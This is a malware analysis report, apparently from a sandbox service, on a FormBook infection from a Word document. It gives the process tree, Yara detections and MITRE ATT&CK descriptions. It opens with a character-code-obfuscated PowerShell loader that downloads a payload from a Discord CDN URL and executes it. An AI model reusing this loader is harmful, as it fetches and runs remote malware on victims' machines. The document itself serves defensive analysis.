0,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,50,48,54,48,55,50,48,52,53,53,55,56,47,109,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($91534784575270519153478457527051915347845752705191534784575270519153478457527051)\|I`E`X
Imagebase:	0x13f920000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: calc.exe PID: 2008 Parent PID: 1344

General

Start time:	18:25:55
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\calc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xa60000
File size:	776192 bytes
MD5 hash:	60B7C0FEAD45F2066E5B805A91F4F0FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: explorer.exe PID: 1764 Parent PID: 2008

General

Start time:	18:25:57
Start date:	02/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cscript.exe PID: 2816 Parent PID: 1764

General

Start time:	18:26:18
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0xb80000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 2408 Parent PID: 2816

General

Start time:	18:26:22
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\WINDOWS\syswow64\calc.exe"
Imagebase:	0x49da0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report RFQ-CIF DT22.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre